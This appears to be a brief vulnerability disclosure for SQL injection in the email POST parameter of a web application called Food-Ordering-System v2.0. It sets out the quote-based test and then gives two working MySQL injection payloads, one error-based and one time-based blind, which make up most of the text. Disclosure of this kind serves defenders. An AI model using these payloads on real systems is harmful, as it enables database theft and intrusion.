Food-Ordering-System-v2.0-SQLi
Description:
The email parameter appears to be vulnerable to SQL injection attacks.
A single quote was submitted in the email parameter, and a database error message was returned.
Two single quotes were then submitted and the error message disappeared.
The attacker can steal all information from the database of this system.
STATUS: HIGH Vulnerability
[+]Payload:
---
Parameter: email (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: email=oUTxWXtc@burpcollaborator.net' AND (SELECT 5169 FROM(SELECT COUNT(*),CONCAT(0x716b627171,(SELECT (ELT(5169=5169,1))),0x71786b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)# bwyS&password=r4Q!t5u!L4
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: email=oUTxWXtc@burpcollaborator.net' AND (SELECT 1469 FROM (SELECT(SLEEP(3)))aKuf)# bETJ&password=r4Q!t5u!L4
---
